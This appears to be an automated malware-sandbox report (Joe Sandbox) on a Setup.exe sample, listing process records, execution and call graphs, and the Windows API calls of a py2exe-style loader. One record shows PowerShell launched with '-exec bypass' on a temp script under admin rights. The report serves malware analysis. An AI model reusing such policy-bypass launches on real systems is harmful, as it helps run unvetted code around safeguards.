                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe"
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          File size:29'152 bytes
                                                                                                                                                                                                          MD5 hash:B6F6C3C38568EE26F1AC70411A822405
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                          Has exited:true

Target ID: 14
Start time: 09:46:28
Start date: 29/11/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\B03VAGDV27AOWCK1I.ps1"
Imagebase: 0xe30000
File size: 433'152 bytes
MD5 hash: C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 15
Start time: 09:46:28
Start date: 29/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Execution Graph

Execution Coverage: 6.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 14.9%
Total number of Nodes: 329
Total number of Limit Nodes: 6
                                                                                                                                                                                                            execution_graph 1035 402b80 1037 402b8e __set_app_type _encode_pointer __p__fmode __p__commode 1035->1037 1038 402c2d _pre_c_init __RTC_Initialize 1037->1038 1039 402c47 1038->1039 1040 402c3b __setusermatherr 1038->1040 1045 402faa _controlfp_s 1039->1045 1040->1039 1043 402c55 _configthreadlocale 1044 402c5e 1043->1044 1046 402c4c 1045->1046 1047 402fc6 _invoke_watson 1045->1047 1046->1043 1046->1044 1047->1046 1073 401e60 1074 401e71 1073->1074 1075 401e8c GetModuleHandleA 1073->1075 1074->1075 1076 401e77 _stricmp 1074->1076 1076->1074 1077 401e97 1076->1077 1078 402360 1079 40237b GetProcAddress 1078->1079 1080 40236d 1078->1080 1080->1079 1081 402388 1080->1081 1082 402820 1083 40284b 1082->1083 1084 402852 1083->1084 1085 402520 39 API calls 1083->1085 1086 402865 1085->1086 1087 40286e 1086->1087 1088 402230 3 API calls 1086->1088 1089 40289b 1088->1089 1090 4022c0 7 API calls 1089->1090 1091 4028a8 1089->1091 1090->1091 1092 402720 1093 402729 1092->1093 1094 40272b 1092->1094 1095 40277e malloc 1094->1095 1098 402746 1094->1098 1096 4027a6 1095->1096 1097 40279b memcpy 1095->1097 1097->1096 1099 4010a0 1100 4010cf 1099->1100 1101 4010d6 1100->1101 1102 4010da MessageBoxA 1100->1102 1103 4010fa 1102->1103 754 4029a1 775 402f2c 754->775 756 4029ad GetStartupInfoA 757 4029db InterlockedCompareExchange 756->757 758 4029ed 757->758 759 4029e9 757->759 761 402a17 758->761 762 402a0d _amsg_exit 758->762 759->758 760 4029f4 Sleep 759->760 760->757 763 402a40 761->763 764 402a20 _initterm_e 761->764 762->763 765 402a6a 763->765 766 402a4f _initterm 763->766 764->763 768 402a3b __onexit 764->768 767 402a6e InterlockedExchange 765->767 770 402a76 __IsNonwritableInCurrentImage 765->770 766->765 767->770 769 402b05 _ismbblead 769->770 770->769 772 402b4a 770->772 773 
402aef exit 770->773 776 401110 770->776 772->768 774 402b53 _cexit 772->774 773->770 774->768 775->756 781 401a40 776->781 778 40111a 780 401170 778->780 784 401b90 778->784 780->770 791 4018e0 781->791 783 401a4c 783->778 790 401ba2 784->790 785 401bf5 getenv 786 401c32 785->786 787 401c09 __iob_func 785->787 786->780 788 401c1d 787->788 788->786 789 401c24 __iob_func 788->789 789->786 790->785 842 401220 FindResourceA 791->842 793 4018eb 794 4018f2 793->794 814 4013e0 793->814 794->783 796 4018ff 796->794 797 401912 6 API calls 796->797 798 401944 getenv 796->798 797->798 799 401973 798->799 800 401958 getenv atoi 798->800 864 401660 799->864 800->799 802 4019ba 803 4019c4 802->803 804 4019d5 802->804 869 4016f0 803->869 874 4017d0 804->874 807 401a36 807->783 808 4019c9 808->807 809 4019e6 808->809 811 401a0b 808->811 882 401540 FindResourceA 809->882 810 401540 54 API calls 810->807 811->810 813 401a03 813->783 815 401400 FindResourceA 814->815 816 4013f7 814->816 818 401412 LoadResource LockResource 815->818 819 401455 815->819 909 401180 GetModuleFileNameA 816->909 917 401d60 818->917 903 401350 CreateFileA 819->903 821 4013fd 821->815 823 401464 825 4014a4 _snprintf 823->825 826 40146d strncmp 823->826 824 40142c 827 401500 824->827 828 401437 GetLastError 824->828 832 401d60 48 API calls 825->832 830 401485 826->830 831 401498 UnmapViewOfFile 826->831 827->796 927 401000 828->927 834 401d60 48 API calls 830->834 831->825 831->827 835 4014cf 832->835 833 401448 833->796 836 401493 834->836 835->827 837 4014d6 GetLastError 835->837 836->831 838 401000 7 API calls 837->838 839 4014e7 838->839 840 401000 7 API calls 839->840 841 4014f3 840->841 841->796 843 401245 842->843 844 40123f 842->844 846 401265 LoadResource 843->846 847 40124c GetLastError 843->847 845 401180 11 API calls 844->845 845->843 849 401271 GetLastError 846->849 850 40128a LockResource 846->850 848 401000 7 API calls 847->848 851 40125d 848->851 852 401000 7 API calls 849->852 853 4012b8 
850->853 854 40129f GetLastError 850->854 851->793 857 401282 852->857 855 4012d2 853->855 856 4012e6 853->856 858 401000 7 API calls 854->858 859 401000 7 API calls 855->859 862 401308 _snprintf 856->862 863 40132e GetModuleFileNameA 856->863 857->793 860 4012b0 858->860 861 4012de 859->861 860->793 861->793 862->793 863->793 865 401670 864->865 865->865 866 4016cc 865->866 867 4016ac strncpy 865->867 868 4016d3 GetFullPathNameA 866->868 867->868 868->802 870 4016fe 869->870 870->870 871 401000 7 API calls 870->871 873 40175c 870->873 872 401752 871->872 872->808 873->808 873->873 875 4017d8 malloc 874->875 877 40180d 875->877 881 401822 875->881 878 401000 7 API calls 877->878 879 401819 878->879 879->808 880 4018c4 free 880->808 881->880 883 401560 LoadResource 882->883 884 4015ac _snprintf LoadLibraryA 882->884 887 401570 LockResource 883->887 888 401653 883->888 885 4015f7 884->885 886 4015dd GetProcAddress 884->886 891 401350 6 API calls 885->891 886->885 890 4015ed 886->890 889 402520 39 API calls 887->889 888->813 892 401582 889->892 890->813 893 401604 891->893 892->888 897 402230 3 API calls 892->897 893->888 894 40160f strncmp 893->894 895 401627 894->895 896 40162e strncmp 894->896 895->896 898 401640 896->898 899 40164c UnmapViewOfFile 896->899 900 401598 897->900 1030 401510 898->1030 899->888 900->884 900->888 904 401372 903->904 905 401377 GetFileSize CreateFileMappingA CloseHandle 903->905 904->823 906 4013a8 905->906 907 4013af MapViewOfFile CloseHandle 905->907 906->823 908 4013cc 907->908 908->823 910 401199 GetLastError 909->910 912 4011b0 909->912 911 401000 7 API calls 910->911 913 4011aa 911->913 912->912 914 4011e4 strrchr 912->914 915 4011c6 strncmp 912->915 913->821 914->821 915->914 918 401d7d 917->918 919 401d6e 917->919 941 402520 918->941 931 401cb0 919->931 922 401d78 922->824 923 401dbb 923->824 924 401d89 924->923 926 401dc3 OutputDebugStringA __iob_func fprintf 924->926 965 402230 924->965 926->923 928 40104e 927->928 929 40100e 
FormatMessageA strncpy LocalFree 927->929 930 401053 lstrlenA _snprintf GetFocus MessageBoxA 928->930 929->930 930->833 932 401cc1 GetModuleHandleA 931->932 934 401cfa 932->934 935 401ced LoadLibraryA 932->935 937 401d25 934->937 939 401d03 934->939 935->934 936 401d54 935->936 936->922 937->922 938 401d10 GetProcAddress 938->939 940 401d2e OutputDebugStringA __iob_func fprintf 938->940 939->937 939->938 940->936 942 40254c 941->942 943 40252d 941->943 945 402574 942->945 946 40255c SetLastError 942->946 943->942 944 402533 _stricmp 943->944 944->943 949 40256b 944->949 947 402592 VirtualAlloc 945->947 948 402582 SetLastError 945->948 946->924 950 4025d3 6 API calls 947->950 951 4025af VirtualAlloc 947->951 948->924 949->924 972 401f60 950->972 951->950 952 4025c3 SetLastError 951->952 952->924 954 402665 977 4023a0 954->977 956 4026b2 free 995 4022c0 956->995 957 402680 957->956 990 402010 957->990 962 4026cd 962->924 963 4026a7 963->956 963->962 964 40269d SetLastError 964->956 966 402243 965->966 967 402247 965->967 966->924 971 402290 967->971 1024 402190 967->1024 969 40226b 970 402272 bsearch 969->970 969->971 970->971 971->924 974 401f88 972->974 976 402005 972->976 973 401fc2 VirtualAlloc memcpy 973->974 974->973 975 401fa4 VirtualAlloc memset 974->975 974->976 975->974 976->954 978 4023c3 IsBadReadPtr 977->978 979 402507 977->979 980 4024ff 978->980 987 4023d9 978->987 979->957 980->957 982 402401 realloc 984 4024ef SetLastError 982->984 982->987 983 4024e7 983->957 984->957 985 4024b6 IsBadReadPtr 985->983 985->987 986 40249c GetProcAddress 986->987 987->982 987->983 987->985 987->986 988 4024df SetLastError 987->988 989 402230 malloc qsort bsearch 987->989 1005 401ea0 987->1005 988->983 989->987 991 4020c5 990->991 993 40202f 990->993 991->962 991->963 991->964 992 402052 VirtualFree 992->993 993->991 993->992 994 40209e VirtualProtect 993->994 994->993 996 40235a 995->996 1004 4022cd 995->1004 996->924 997 402327 998 40233c 997->998 999 40232e 
VirtualFree 997->999 1001 402343 free 998->1001 1002 402349 GetProcessHeap HeapFree 998->1002 999->998 1000 40231d free 1000->997 1001->1002 1002->996 1004->997 1004->1000 1014 401f20 1004->1014 1006 401eb1 1005->1006 1007 401ecc 1005->1007 1006->1007 1008 401eb7 _stricmp 1006->1008 1009 401f08 LoadLibraryA 1007->1009 1011 401ee6 1007->1011 1008->1006 1010 401eff 1008->1010 1009->987 1010->987 1012 402520 36 API calls 1011->1012 1013 401eed free 1012->1013 1013->987 1015 401f3b FreeLibrary 1014->1015 1016 401f2f 1014->1016 1015->1004 1016->1015 1017 401f44 1016->1017 1018 401f55 1017->1018 1022 401e20 free 1017->1022 1018->1004 1021 4022c0 6 API calls 1021->1018 1023 401e34 1022->1023 1023->1021 1025 402223 1024->1025 1026 40219f malloc 1024->1026 1025->969 1027 4021d7 1026->1027 1028 4021dc qsort 1026->1028 1027->969 1028->1025 1031 402520 39 API calls 1030->1031 1032 40151f 1031->1032 1033 401531 1032->1033 1034 402230 3 API calls 1032->1034 1033->899 1034->1033 1104 402c61 1107 402fd8 1104->1107 1106 402c66 1106->1106 1108 40300a GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 1107->1108 1109 402ffd 1107->1109 1110 403001 1108->1110 1109->1108 1109->1110 1110->1106 1048 402f85 _except_handler4_common 1111 4030a8 IsDebuggerPresent _crt_debugger_hook SetUnhandledExceptionFilter UnhandledExceptionFilter 1112 403192 _crt_debugger_hook 1111->1112 1113 40319a GetCurrentProcess TerminateProcess 1111->1113 1112->1113 1114 402c6b 1115 402ca7 1114->1115 1117 402c7d 1114->1117 1116 402ca2 ?terminate@ 1116->1115 1117->1115 1117->1116 1118 402cad SetUnhandledExceptionFilter 1119 402b2f 1120 402b43 _exit 1119->1120 1121 402b4a 1119->1121 1120->1121 1122 402b53 _cexit 1121->1122 1123 402b59 __onexit 1121->1123 1122->1123 1049 401a50 getenv 1050 401a8c 1049->1050 1051 401a62 __iob_func 1049->1051 1050->1050 1052 401a77 1051->1052 1052->1050 1053 401a7e __iob_func 1052->1053 1053->1050 1054 402150 _stricmp 1125 4026f0 malloc 
1126 402701 1125->1126 1127 402703 memcpy 1125->1127 1055 402956 1060 402d67 1055->1060 1058 4029a0 1059 402998 _amsg_exit 1059->1058 1063 402cc2 1060->1063 1062 402960 __getmainargs 1062->1058 1062->1059 1070 402f2c 1063->1070 1065 402cce _decode_pointer 1066 402cf1 7 API calls 1065->1066 1067 402ce5 _onexit 1065->1067 1071 402d5e _unlock 1066->1071 1068 402d55 __onexit 1067->1068 1068->1062 1070->1065 1071->1068 1072 402b1b _XcptFilter

Callgraph

• Executed
• Not Executed
• Opacity -> Relevance
• Disassembly available
                                                                                                                                                                                                            callgraph 0 Function_00401A40 16 Function_004018E0 0->16 1 Function_004027C0 3 Function_00401C40 1->3 49 Function_00401C90 1->49 2 Function_00401540 7 Function_00401350 2->7 43 Function_00401510 2->43 55 Function_00402520 2->55 70 Function_00402230 2->70 4 Function_004022C0 51 Function_00401F20 4->51 5 Function_00402CC2 15 Function_00402D5E 5->15 34 Function_00402F71 5->34 66 Function_00402F2C 5->66 6 Function_004020D0 8 Function_00402DD0 9 Function_004017D0 9->3 37 Function_00401000 9->37 10 Function_00401A50 11 Function_00402150 12 Function_00402FD5 13 Function_00402956 25 Function_00402D67 13->25 14 Function_00402FD8 16->2 16->3 16->9 17 Function_00401660 16->17 18 Function_004013E0 16->18 31 Function_004016F0 16->31 60 Function_00401220 16->60 18->7 19 Function_00401D60 18->19 18->37 38 Function_00401180 18->38 19->55 69 Function_00401CB0 19->69 19->70 20 Function_00402E60 20->8 45 Function_00402E10 20->45 21 Function_00401F60 22 Function_00401E60 23 Function_00402360 24 Function_00402C61 24->14 25->5 26 Function_00402B67 27 Function_00402C6B 28 Function_00402B6B 28->34 29 Function_00402EEB 30 Function_00401DF0 31->37 32 Function_00402170 33 Function_004026F0 35 Function_00402D7E 36 Function_00402EFF 38->37 39 Function_00402900 40 Function_00402B80 40->12 40->35 65 Function_00402FAA 40->65 41 Function_00402F85 42 Function_00403086 43->55 43->70 44 Function_00401110 44->0 47 Function_00401B90 44->47 61 Function_00402920 44->61 46 Function_00402010 47->3 58 Function_00401AA0 47->58 48 Function_00402190 50 Function_00402B1B 51->4 54 Function_00401E20 51->54 52 Function_004023A0 53 Function_00401EA0 52->53 52->70 53->55 55->4 55->6 55->21 55->30 55->46 55->52 56 Function_00402820 56->4 56->55 56->70 57 Function_00402720 57->3 58->3 59 Function_004010A0 60->37 
60->38 62 Function_004029A1 62->20 62->34 62->44 62->66 63 Function_00402DA4 64 Function_004030A8 67 Function_00402CAD 68 Function_00402B2F 68->34 70->48

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(00000001,?,004056A8,?,00401D78,?,00000000,004014CF,?,00000000), ref: 00401CE1
• LoadLibraryA.KERNELBASE(00000000,?,004056A8,?,00401D78,?,00000000,004014CF,?,00000000), ref: 00401CEE
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00401D14
• OutputDebugStringA.KERNEL32(undef symbol,?,004056A8,?,00401D78,?,00000000,004014CF,?,00000000), ref: 00401D33
• __iob_func.MSVCR90 ref: 00401D41
• fprintf.MSVCR90 ref: 00401D4B
Strings
Memory Dump Source
• Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Setup.jbxd
Similarity
• API ID: AddressDebugHandleLibraryLoadModuleOutputProcString__iob_funcfprintf
• String ID: undef symbol$undefined symbol %s -> exit(-1)
• API String ID: 3232099167-3880521481
• Opcode ID: a62e86013865cb6945eca6c9e6b857a4ad3fd4014c4c712411902039301153c0
• Instruction ID: ec091370b392768ebba2b9cbd08fa3fa07ccb6f4dd854fbc632097c7e97f4075
• Opcode Fuzzy Hash: a62e86013865cb6945eca6c9e6b857a4ad3fd4014c4c712411902039301153c0
• Instruction Fuzzy Hash: 9A11E2B16003029FEB216B699C487677798EFD4351F194437EA82F33B0D778DC958A18

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(C:\Users\user\AppData\Roaming\FeGIPCnK\common.bin,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00401464,?), ref: 00401365
                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00401464,?,?,?,00401464,?), ref: 0040137F
                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 00401392
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00401464,?), ref: 004013A1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • C:\Users\user\AppData\Roaming\FeGIPCnK\common.bin, xrefs: 00401364
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Setup.jbxd
Similarity
• API ID: File$Create$CloseHandleMappingSize
• String ID: C:\Users\user\AppData\Roaming\FeGIPCnK\common.bin
• API String ID: 3089540790-2908931457

Control-flow Graph

APIs
• FindResourceA.KERNEL32(?,00000001,ZLIB.PYD), ref: 00401556
• LoadResource.KERNEL32(?,00000000), ref: 00401562
• LockResource.KERNEL32(00000000), ref: 00401571
  • Part of subcall function 00402520: _stricmp.MSVCR90(00000000,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 0040253C
  • Part of subcall function 00402520: SetLastError.KERNEL32(0000000B,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 0040255E
• _snprintf.MSVCR90 ref: 004015C5
• LoadLibraryA.KERNEL32(?), ref: 004015D3
• GetProcAddress.KERNEL32(00000000,initzlib), ref: 004015E3
Strings
Memory Dump Source
• Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Setup.jbxd
Similarity
• API ID: Resource$Load$AddressErrorFindLastLibraryLockProc_snprintf_stricmp
• String ID: %s\%s$<pythondll>$<zlib.pyd>$C:\Users\user\AppData\Roaming\FeGIPCnK$C:\Users\user\AppData\Roaming\FeGIPCnK\common.bin$ZLIB.PYD$initzlib$initzlib$zlib.pyd$zlib.pyd
• API String ID: 2010571536-3392275420
APIs
• free.MSVCR90 ref: 00402321
• VirtualFree.KERNEL32(C0335F5D,00000000,00008000,?,00000000,004026C2,00000000), ref: 00402336
• free.MSVCR90 ref: 00402344
• GetProcessHeap.KERNEL32(00000000,004026C2,?,00000000,004026C2,00000000), ref: 0040234C
• HeapFree.KERNEL32(00000000), ref: 00402353
Memory Dump Source
• Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Setup.jbxd
Similarity
• API ID: FreeHeapfree$ProcessVirtual
• String ID:
• API String ID: 2257755588-0
Strings
Memory Dump Source
• Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Setup.jbxd
Similarity
• API ID:
• String ID: _MessageBox$sys$windows_exe
• API String ID: 0-3849625447
APIs
• SetUnhandledExceptionFilter.KERNEL32(Function_00002C6B), ref: 00402CB2
Memory Dump Source
• Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Setup.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0

Control-flow Graph

APIs
• FindResourceA.KERNEL32(?,00000001,PYTHON27.DLL), ref: 00401408
• LoadResource.KERNEL32(?,00000000), ref: 00401414
• LockResource.KERNEL32(00000000), ref: 0040141B
• GetLastError.KERNEL32(Could not load python dll), ref: 0040143C
  • Part of subcall function 00401180: GetModuleFileNameA.KERNEL32(?,C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe,00000304,00401245,?,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 0040118F
  • Part of subcall function 00401180: GetLastError.KERNEL32(Retrieving module name,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 0040119E
  • Part of subcall function 00401350: CreateFileA.KERNELBASE(C:\Users\user\AppData\Roaming\FeGIPCnK\common.bin,80000000,00000001,00000000,00000003,00000080,00000000,?,?,00401464,?), ref: 00401365
• strncmp.MSVCR90 ref: 00401478
• UnmapViewOfFile.KERNEL32(00000000), ref: 00401499
• _snprintf.MSVCR90 ref: 004014BD
• GetLastError.KERNEL32(LoadLibrary(pythondll) failed), ref: 004014DB
Strings
Memory Dump Source
• Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Setup.jbxd
Similarity
• API ID: ErrorFileLastResource$CreateFindLoadLockModuleNameUnmapView_snprintfstrncmp
• String ID: %s\%s$<pythondll>$C:\Users\user\AppData\Roaming\FeGIPCnK$C:\Users\user\AppData\Roaming\FeGIPCnK\common.bin$Could not load python dll$LoadLibrary(pythondll) failed$PYTHON27.DLL$PYTHON27.DLL$PYTHON27.DLL$PYTHON27.DLL
• API String ID: 948983971-1477857133

Control-flow Graph

APIs
• FindResourceA.KERNEL32(?,00000001,PYTHONSCRIPT), ref: 0040122E
• GetLastError.KERNEL32(Could not locate script resource:,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 00401251
  • Part of subcall function 00401180: GetModuleFileNameA.KERNEL32(?,C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe,00000304,00401245,?,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 0040118F
  • Part of subcall function 00401180: GetLastError.KERNEL32(Retrieving module name,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 0040119E
• LoadResource.KERNEL32(?,00000000,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 00401267
• GetLastError.KERNEL32(Could not load script resource:,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 00401276
  • Part of subcall function 00401000: FormatMessageA.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000), ref: 00401024
  • Part of subcall function 00401000: strncpy.MSVCR90 ref: 00401038
  • Part of subcall function 00401000: LocalFree.KERNEL32(?), ref: 00401046
  • Part of subcall function 00401000: lstrlenA.KERNEL32(00000000), ref: 00401058
  • Part of subcall function 00401000: _snprintf.MSVCR90 ref: 00401073
  • Part of subcall function 00401000: GetFocus.USER32 ref: 00401085
  • Part of subcall function 00401000: MessageBoxA.USER32(00000000), ref: 0040108C
• LockResource.KERNEL32(00000000,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 0040128B
• GetLastError.KERNEL32(Could not lock script resource:,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 004012A4
Strings
Memory Dump Source
• Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Setup.jbxd
Similarity
• API ID: ErrorLast$Resource$Message$FileFindFocusFormatFreeLoadLocalLockModuleName_snprintflstrlenstrncpy
• String ID: %s\%s$Bug: Invalid script resource$C:\Users\user\AppData\Roaming\FeGIPCnK$C:\Users\user\AppData\Roaming\FeGIPCnK\common.bin$Could not load script resource:$Could not locate script resource:$Could not lock script resource:$PYTHONSCRIPT
• API String ID: 1129944797-1125715016

Control-flow Graph

APIs
  • Part of subcall function 00401220: FindResourceA.KERNEL32(?,00000001,PYTHONSCRIPT), ref: 0040122E
  • Part of subcall function 00401220: GetLastError.KERNEL32(Could not locate script resource:,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 00401251
• __iob_func.MSVCR90 ref: 0040191B
• setbuf.MSVCR90 ref: 00401924
• __iob_func.MSVCR90 ref: 0040192B
• setbuf.MSVCR90 ref: 00401931
• __iob_func.MSVCR90 ref: 00401938
• setbuf.MSVCR90 ref: 0040193E
• getenv.MSVCR90 ref: 0040194F
• getenv.MSVCR90 ref: 0040195D
• atoi.MSVCR90 ref: 00401960
Strings
Memory Dump Source
• Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Setup.jbxd
Similarity
• API ID: __iob_funcsetbuf$getenv$ErrorFindLastResourceatoi
• String ID: C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe$PY2EXE_VERBOSE$PY2EXE_VERBOSE$frozen$frozen
• API String ID: 2889461157-3899828694

Control-flow Graph

APIs
• _stricmp.MSVCR90(00000000,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 0040253C
• SetLastError.KERNEL32(0000000B,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 0040255E
• SetLastError.KERNEL32(0000000B,?,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 00402584
• VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?), ref: 004025A7
• VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 004025BB
• SetLastError.KERNEL32(00000008,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 004025C5
• GetProcessHeap.KERNEL32(00000000,00000028,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 004025D7
• HeapAlloc.KERNEL32(00000000,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 004025DE
• _strdup.MSVCR90(?,?,?,004056A8,?,00401D89,?,?,?,00000000,004014CF,?,00000000), ref: 00402606
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000), ref: 00402625
• VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00402637
• memcpy.MSVCR90(00000000,?,?), ref: 0040264A
• SetLastError.KERNEL32(0000000B), ref: 0040269F
• free.MSVCR90 ref: 004026B6
Memory Dump Source
• Source File: 00000003.00000002.1936332755.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1936263598.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936383863.0000000000404000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936399440.0000000000405000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000003.00000002.1936454460.0000000000407000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_Setup.jbxd
Similarity
• API ID: Alloc$ErrorLastVirtual$Heap$Process_strdup_stricmpfreememcpy
• String ID:
• API String ID: 2469453545-0

Control-flow Graph

APIs
• GetModuleFileNameA.KERNEL32(?,C:\Users\user\AppData\Roaming\FeGIPCnK\Setup.exe,00000304,00401245,?,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 0040118F
• GetLastError.KERNEL32(Retrieving module name,?,?,004018EB,?,?,00401A4C,00000000,?,0040111A,windows_exe), ref: 0040119E
  • Part of subcall function 00401000: FormatMessageA.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000), ref: 00401024
  • Part of subcall function 00401000: strncpy.MSVCR90 ref: 00401038
  • Part of subcall function 00401000: LocalFree.KERNEL32(?), ref: 00401046
  • Part of subcall function 00401000: lstrlenA.KERNEL32(00000000), ref: 00401058
  • Part of subcall function 00401000: _snprintf.MSVCR90 ref: 00401073
  • Part of subcall function 00401000: GetFocus.USER32 ref: 00401085
